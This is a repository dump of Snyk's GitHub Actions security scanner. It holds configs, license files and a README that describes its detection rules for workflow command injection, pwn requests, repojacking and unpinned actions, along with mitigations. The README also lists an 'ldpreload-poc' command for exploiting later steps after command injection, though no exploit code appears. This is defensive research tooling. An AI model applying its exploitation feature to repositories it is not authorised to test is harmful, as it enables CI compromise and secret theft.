├── .circleci └── config.yml ├── .eslintrc.yml ├── .github └── CODEOWNERS ├── .gitignore ├── .gitmodules ├── .pre-commit-config.yaml ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── NOTICE ├── README.md ├── SECURITY.md ├── catalog-info.yaml ├── index.mjs ├── lib ├── actions.mjs ├── clone.mjs ├── outputHandler.mjs ├── rules │ ├── cmd_exec.mjs │ ├── code_injection.mjs │ ├── common │ │ ├── defs.mjs │ │ ├── finding.mjs │ │ └── utils.mjs │ ├── pwn_request.mjs │ ├── repojackable.mjs │ ├── test_rule.mjs │ ├── unpinned_action.mjs │ ├── unsafe_input_assign.mjs │ └── workflow_run.mjs ├── scanner.mjs ├── test │ ├── actions.test.js │ ├── clone.test.js │ ├── rules_common_utils.test.js │ └── utils.test.js └── utils.mjs ├── package-lock.json └── package.json /.circleci/config.yml: -------------------------------------------------------------------------------- 1 | version: 2.1 2 | 3 | orbs: 4 | snyk: snyk/snyk@2.1.0 5 | 6 | defaults: &defaults 7 | resource_class: small 8 | docker: 9 | - image: cimg/node:22.2.0 10 | 11 | jobs: 12 | security_scans: 13 | <<: *defaults 14 | steps: 15 | - checkout 16 | - snyk/scan: 17 | fail-on-issues: false 18 | monitor-on-build: true 19 | - snyk/scan: 20 | command: code test --report --project-name=snyk-labs/github-actions-scanner 21 | fail-on-issues: false 22 | monitor-on-build: false 23 | 24 | npm_test: 25 | <<: *defaults 26 | steps: 27 | - checkout 28 | 29 | - restore_cache: 30 | keys: 31 | - v1-dependencies-{{ checksum "package.json" }} 32 | # fallback to using the latest cache if no exact match is found 33 | - v1-dependencies- 34 | 35 | - run: 36 | name: Install Dependencies 37 | command: npm install 38 | 39 | - save_cache: 40 | paths: 41 | - node_modules 42 | key: v1-dependencies-{{ checksum "package.json" }} 43 | 44 | - run: 45 | name: Run Tests 46 | command: npm test 47 | 48 | workflows: 49 | version: 2 50 | CICD: 51 | jobs: 52 | - security_scans: 53 | name: Security Scans 54 | context: 55 | - security-labs-snyk 56 | - npm_test: 57 | name: Run npm test 58 | -------------------------------------------------------------------------------- /.eslintrc.yml: -------------------------------------------------------------------------------- 1 | env: 2 | browser: true 3 | es2021: true 4 | extends: airbnb-base 5 | parserOptions: 6 | ecmaVersion: latest 7 | sourceType: module 8 | rules: {} 9 | -------------------------------------------------------------------------------- /.github/CODEOWNERS: -------------------------------------------------------------------------------- 1 | * @snyk/security-labs 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | lerna-debug.log* 8 | .pnpm-debug.log* 9 | 10 | # Diagnostic reports (https://nodejs.org/api/report.html) 11 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 12 | 13 | # Runtime data 14 | pids 15 | *.pid 16 | *.seed 17 | *.pid.lock 18 | 19 | # Directory for instrumented libs generated by jscoverage/JSCover 20 | lib-cov 21 | 22 | # Coverage directory used by tools like istanbul 23 | coverage 24 | *.lcov 25 | 26 | # nyc test coverage 27 | .nyc_output 28 | 29 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 30 | .grunt 31 | 32 | # Bower dependency directory (https://bower.io/) 33 | bower_components 34 | 35 | # node-waf configuration 36 | .lock-wscript 37 | 38 | # Compiled binary addons (https://nodejs.org/api/addons.html) 39 | build/Release 40 | 41 | # Dependency directories 42 | node_modules/ 43 | jspm_packages/ 44 | 45 | # Snowpack dependency directory (https://snowpack.dev/) 46 | web_modules/ 47 | 48 | # TypeScript cache 49 | *.tsbuildinfo 50 | 51 | # Optional npm cache directory 52 | .npm 53 | 54 | # Optional eslint cache 55 | .eslintcache 56 | 57 | # Optional stylelint cache 58 | .stylelintcache 59 | 60 | # Microbundle cache 61 | .rpt2_cache/ 62 | .rts2_cache_cjs/ 63 | .rts2_cache_es/ 64 | .rts2_cache_umd/ 65 | 66 | # Optional REPL history 67 | .node_repl_history 68 | 69 | # Output of 'npm pack' 70 | *.tgz 71 | 72 | # Yarn Integrity file 73 | .yarn-integrity 74 | 75 | # dotenv environment variable files 76 | .env 77 | .env.development.local 78 | .env.test.local 79 | .env.production.local 80 | .env.local 81 | 82 | # parcel-bundler cache (https://parceljs.org/) 83 | .cache 84 | .parcel-cache 85 | 86 | # Next.js build output 87 | .next 88 | out 89 | 90 | # Nuxt.js build / generate output 91 | .nuxt 92 | dist 93 | 94 | # Gatsby files 95 | .cache/ 96 | # Comment in the public line in if your project uses Gatsby and not Next.js 97 | # https://nextjs.org/blog/next-9-1#public-directory-support 98 | # public 99 | 100 | # vuepress build output 101 | .vuepress/dist 102 | 103 | # vuepress v2.x temp and cache directory 104 | .temp 105 | .cache 106 | 107 | # Docusaurus cache and generated files 108 | .docusaurus 109 | 110 | # Serverless directories 111 | .serverless/ 112 | 113 | # FuseBox cache 114 | .fusebox/ 115 | 116 | # DynamoDB Local files 117 | .dynamodb/ 118 | 119 | # TernJS port file 120 | .tern-port 121 | 122 | # Stores VSCode versions used for testing VSCode extensions 123 | .vscode-test 124 | 125 | # yarn v2 126 | .yarn/cache 127 | .yarn/unplugged 128 | .yarn/build-state.yml 129 | .yarn/install-state.gz 130 | .pnp.* 131 | 132 | output/ 133 | tmp/ 134 | 135 | .dccache 136 | 137 | cookie.json 138 | sa-key.json -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/snyk-labs/github-actions-scanner/435a6c75bcfaea5edb5bb97690e01e1a94de850c/.gitmodules -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/gitleaks/gitleaks 3 | rev: v8.16.1 4 | hooks: 5 | - id: gitleaks 6 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | `oss-conduct-reports@snyk.io`. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # CONTRIBUTING.md 2 | 3 | First and foremost, thank you for considering contributing to this project! Your contribution is valuable and we genuinely appreciate your interest. 4 | 5 | This is a distinct software project developed by Snyk. Although separate from our core product line, it provides a platform for us to demonstrate our capabilities and some key concepts. 6 | 7 | Please note that we monitor and respond to issues and pull requests on a best-effort basis. 8 | 9 | ### How to contribute 10 | 11 | #### Code of Conduct 12 | 13 | Prior to contributing, please familiarize yourself with our [Code of Conduct](CODE_OF_CONDUCT.md). We expect all our contributors to uphold these guidelines to maintain a respectful and inclusive environment. 14 | 15 | #### Open Development 16 | 17 | All development work is done directly on GitHub. Both our core team members and external contributors send pull requests, which go through a unified review process. 18 | 19 | #### Reporting Issues 20 | 21 | We welcome you to raise an issue if you discover a bug, find a documentation error, or identify a feature you believe should be added. You can do this by opening a new issue in the issue tracker. Please ensure that your issue hasn't already been reported by reviewing existing issues before creating a new one. We value the time and effort you spend in providing these details. 22 | 23 | #### Pull Requests 24 | 25 | We highly recommend that contributors raise an issue before making a pull request. This allows us to discuss potential changes and prevent unnecessary or duplicative work. Once the issue has been reviewed and we've agreed on a solution, contributors can then fork the repository and submit a pull request. 26 | 27 | ##### Submitting your Pull Request 28 | 29 | - Ensure your code passes all tests, and consider adding new tests for the changes you've made. 30 | - In your Pull Request description, provide a detailed explanation of your changes. This assists us in understanding your decision-making process and aids in the effective review of your work. 31 | - Remember to reference the relevant issue number in your pull request. 32 | 33 | Your time and efforts make this project better, and we're grateful for your support and contributions. Thank you! 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2024 Snyk Ltd. 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /NOTICE: -------------------------------------------------------------------------------- 1 | © 2024 Snyk Limited All rights reserved. 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | 15 | ### Third party software ### 16 | We use third-party libraries, whose license information is included 17 | in the repository folder 'licenses'. 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### ❗ **IMPORTANT NOTICE** ❗ ### 2 | 3 | This tool was released as part of a research project on Github Actions by the Security Labs team and isn't supported by Snyk products. 4 | For more details, please follow the Area41 [talk](https://www.youtube.com/watch?v=pUa5P7THc3c&index=4) and Snyk [blog](https://snyk.io/blog/exploring-vulnerabilities-github-actions/). 5 | 6 | # Github Actions Scanner 7 | 8 | Scans your Github Actions for security issues. 9 | 10 | ## Usage 11 | 12 | Run: `npm run start -- [OPTIONS]`. 13 | 14 | ``` 15 | Github Actions Scanner 16 | 17 | Options: 18 | -e, --env .env file path. (default: ".env") 19 | -r, --recurse Recurse into referenced actions 20 | -m, --max-depth Max Recursion Depth (default: 5) 21 | -s, --scan-rules Comma separated list of rules to use, by ID (default: "") 22 | --output Output file path. 23 | -f, --format Output format (choices: "json", "text", default: "text") 24 | -h, --help display help for command 25 | 26 | Commands: 27 | list-rules List all available rules 28 | scan-repo [options] Scan a single repo 29 | scan-org [options] Scan all repos in an org 30 | scan-actions [options] Scan a list of standalone actions from a file 31 | clone [options] Pseudo-fork a repo for testing 32 | ldpreload-poc [options] Create a PoC to exploit subsequent steps after command injection with LD_PRELOAD 33 | help [command] display help for command 34 | ``` 35 | 36 | ### `list-rules` 37 | 38 | ``` 39 | List all available rules 40 | 41 | Options: 42 | -h, --help display help for command 43 | ``` 44 | 45 | ### `scan-repo` 46 | 47 | ``` 48 | Scan a single repo 49 | 50 | Options: 51 | -u, --url Github repository URL. 52 | -h, --help display help for command 53 | ``` 54 | 55 | ### `scan-org` 56 | 57 | ``` 58 | Scan all repos in an org 59 | 60 | Options: 61 | -o, --org Github org name. 62 | -h, --help display help for command 63 | ``` 64 | 65 | ### `scan-actions` 66 | 67 | ``` 68 | Scan a list of standalone actions from a file 69 | 70 | Options: 71 | -a, --actions-yaml [actions-yaml-path] Analyze actions from yaml. (default: "./github-action-repos.yml") 72 | -h, --help display help for command 73 | ``` 74 | 75 | 76 | ### `clone` 77 | 78 | ``` 79 | Pseudo-fork a repo for testing 80 | 81 | Options: 82 | -u, --url Github repository URL. 83 | -h, --help display help for command 84 | ``` 85 | 86 | ### `ldpreload-poc` 87 | 88 | ``` 89 | Create a PoC to exploit subsequent steps after command injection with LD_PRELOAD 90 | 91 | Options: 92 | -c, --command Command to run from the LD_PRELOAD 93 | -b, --base64 Encode the code for injection 94 | -h, --help display help for command 95 | ``` 96 | 97 | Please provide a `GITHUB_TOKEN` either via `.env` file or env var. 98 | 99 | ## Rules 100 | ### `CMD_EXEC` 101 | **Description:** Dynamic values inserted into a [`run`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun) (or similar) item using `${{ }}` are not escaped and, if controlled by an attacker, may result in command execution inside the step. 102 | 103 | **Mitigation:** 104 | 105 | - Pass the expressions to an action as an argument in the [`with`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepswith) clause 106 | - Pass the expressions to a [`run`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun) directive using an intermediate [environmental variable](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsenv). For more details, please check [Good practices for mitigating script injection attacks](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#good-practices-for-mitigating-script-injection-attacks). 107 | 108 | ### `CODE_INJECT` 109 | **Description:** Similar to `CMD_EXEC`, when using the `actions/github-script` action, values inserted using `${{ }}` are not escaped and, if controlled by an attacker, may result in command execution inside the step. 110 | 111 | **Mitigation:** Pass the expressions to the action as an argument in the [`with`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepswith) clause. 112 | 113 | ### `PWN_REQUEST` 114 | **Description:** An action triggered by `pull_request_target` which additionally performs a checkout of the pull request branch may lead to compromise of specific steps or secrets. `pull_request_target` can be triggered by untrusted external attackers. 115 | 116 | **Mitigation:** If accepting actions triggered by unknown third parties, ensure that the pull request branch is not checked out and acted on unsafely (e.g via the use of tooling which acts on the repository, such as `npm install`). If it is necessary to check out the third party code, be very careful to ensure that no steps treat the repository as trusted. 117 | 118 | ### `UNSAFE_INPUT_ASSIGN` 119 | **Description:** Potentially attacker controlled input is passed by value to a step using `with`. Depending on the contents of the step involved, if these values are not handled with care this may result in further compromise (such as command or code execution in the step). 120 | 121 | **Mitigation:** Ensure that all values which may be attacker control are handled with care to ensure that they do not result in further compromise. 122 | 123 | ### `WORKFLOW_RUN` 124 | **Description:** The identified action is triggered by another action, and performs a checkout of the branch which triggered the original action. This branch may be attacker controlled and therefore this action chain should be reviewed. 125 | 126 | **Mitigation:** Ensure that subsequently triggered actions treat untrusted data sources as untrusted, especially when the origin is masked by indirection of the original action. 127 | 128 | ### `REPOJACKABLE` 129 | **Description:** The identified referenced action may be repojackable. Either the organisation has been renamed or does not exist at all. 130 | 131 | **Mitigation:** Ensure that all `uses` items reference present and up-to-date repositories to ensure that they cannot be repojacked if renamed or deleted. 132 | 133 | ### `UNPINNED_ACTION` 134 | **Description:** The identified action is used (i.e via `uses:`) with a branch or tag reference, rather than a fixed commit. Should the target action repository be compromised this action may therefore be at risk. 135 | 136 | **Mitigation:** Ensure that all actions are referenced by a fixed and validated commit hash. 137 | 138 | ## Writing new rules 139 | 140 | To write your own rules, create a new `.mjs` file in the `rules` directory. This file should be written in Javascript and implement a single rule. Inside this file, implement and export a class which includes the following methods and attributes: 141 | 142 | ```javascript 143 | class MyRule { 144 | static id = "MY_RULE"; 145 | static documentation = "https://github.com/snyk/github-actions-scanner/blob/main/README.md#MY_RULE" 146 | 147 | static async description(finding) { 148 | // takes a single Finding instance, as defined in finding.mjs. Will always be from those returned by `scan` 149 | // allows for full context creation of a single line to provide a description for a single finding instance 150 | return ""; 151 | } 152 | 153 | static async prereport(finding) { 154 | // Optional 155 | // Perform final modification to a finding of this type once all scans have been completed 156 | // Useful for looking at other actions in the same repository 157 | } 158 | 159 | static async scan(action) { 160 | // Takes a single Action instance (defined in actions.mjs) and returns an array of Finding instances (defined in finding.mjs) 161 | return [ 162 | new Finding(MyRule, action, job_name, step_name_or_id, {"optional": "data"}); 163 | ] 164 | } 165 | } 166 | 167 | export { MyRule as default } 168 | ``` 169 | 170 | ### Matching Engine 171 | The `stepMatches` and `evaluteStepRule` functions are provided to assist with creating rules. 172 | 173 | `stepMatches` takes an array of individual 'rules' and an action step and returns an array of those rules which match. The rules are objects which can define either full match key:values, match based on regex on the value for a key, and keys not present. Examples to show this in action are as follows: 174 | 175 | The following example shows a match for the inclusion of any (denoted by the wildcard '*') secrets in the `env` object for the provided step. The resulting `matches` array wil contain the single matching rule. 176 | 177 | ```javascript 178 | const RULES = [ 179 | { env: { "*": new RegExp("\\${{\\s*secrets[.]") } } 180 | ] 181 | 182 | const step = { 183 | name: 'Secrets test', 184 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 185 | env: { 186 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 187 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 188 | }, 189 | with: { 190 | command: 'omitted' 191 | } 192 | } 193 | 194 | const matches = stepMatches(RULES, step); 195 | ``` 196 | 197 | The following rule attempts to ensure that the `env.DOESNTMATCH` key is _not_ present. In this case the resulting `matches` array will be empty. 198 | 199 | ```javascript 200 | const RULES = [ 201 | { env: { "DOESNTMATCH": undefined } }, 202 | ] 203 | 204 | const step = { 205 | name: 'DOESNTMATCH test', 206 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 207 | env: { 208 | DOESNTMATCH: "true" 209 | }, 210 | with: { 211 | command: 'omitted' 212 | } 213 | } 214 | 215 | const matches = stepMatches(RULES, step); 216 | ``` 217 | 218 | The additional function `evaluateStepRule` aids in the further processing of such a match. This function takes a single rule and a single step, and returns the step object only where the rule is specified. 219 | 220 | For example, the following rule will attempt to find environmental variables which match the `.INDME` regex. The resultant evaluation will only contain those elements that match the rule, in the same format as the rule itself. 221 | 222 | ```javascript 223 | const RULE = { env: { "*": new RegExp(".INDME") } }; 224 | 225 | const step = { 226 | foo: "bar", 227 | env: { 228 | "abc": "FINDME", 229 | "def": "notme", 230 | "ghi": "FINDME" 231 | } 232 | } 233 | 234 | const evaluated = evaluateStepRule(RULE, step) 235 | 236 | expect(evaluated).toEqual({ 237 | "env": { 238 | "abc": "FINDME", 239 | "ghi": "FINDME", 240 | } 241 | }) 242 | ``` 243 | 244 | A third, optional, parameter can be passed to evaluateStepRule. This parameter is an object which is a subset of the rule object, and can be used to specify the regex match groups to extract in place of the full field. The example below shows extracting the suffix in place of the full environmental variable value. If no value is provided for a specific regex in the object, the full value will be returned. This is useful for displaying the specific line where an injection occurs, or extracting the interpolated variable inside a `${{ }}` item. 245 | 246 | ```javascript 247 | const RULE = { env: { "*": new RegExp("FINDME(?...)") } }; 248 | 249 | const step = { 250 | foo: "bar", 251 | env: { 252 | "abc": "FINDMEabc", 253 | "def": "notme", 254 | "ghi": "FINDMEdef" 255 | } 256 | } 257 | 258 | const evaluated = evaluateStepRule(RULE, step, { env: { "*": "suffix" } }) 259 | 260 | expect(evaluated).toEqual({ 261 | "env": { 262 | "abc": "abc", 263 | "ghi": "def", 264 | } 265 | }) 266 | ``` 267 | 